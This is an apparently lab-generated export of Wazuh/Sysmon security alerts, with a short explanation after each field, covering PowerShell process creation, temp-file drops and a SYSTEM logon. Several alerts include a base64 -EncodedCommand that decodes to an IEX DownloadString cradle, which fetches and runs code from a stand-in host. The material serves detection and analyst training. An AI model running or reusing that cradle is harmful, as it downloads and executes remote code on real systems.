TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wrzawqio.au1.ps1
CreationUtcTime: 2025-04-24 22:38:07.834
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:07.834 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd4a-680a-660b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wrzawqio.au1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:07.834 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 65 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534292.1556242 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:10.3560006Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284299 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:09.068
ProcessGuid: {94294ddc-bd51-680a-690b-000000000e00}
ProcessId: 10148
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00}
ParentProcessId: 10844
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:09.068 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd51-680a-690b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 69 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534292.1564313 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:10.6058844Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284311 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:10.562
ProcessGuid: {94294ddc-bd51-680a-690b-000000000e00}
ProcessId: 10148
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_fabyeuej.msp.ps1
CreationUtcTime: 2025-04-24 22:38:10.562
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:10.562 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd51-680a-690b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fabyeuej.msp.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:10.562 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534293.1567082 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:10.4754770Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43855 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 66 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534295.1574417 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:13.3701266Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284355 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:12.078
ProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00}
ProcessId: 15472
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd51-680a-690b-000000000e00}
ParentProcessId: 10148
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:12.078 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd54-680a-6c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15472 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd51-680a-690b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 70 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534296.1582488 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
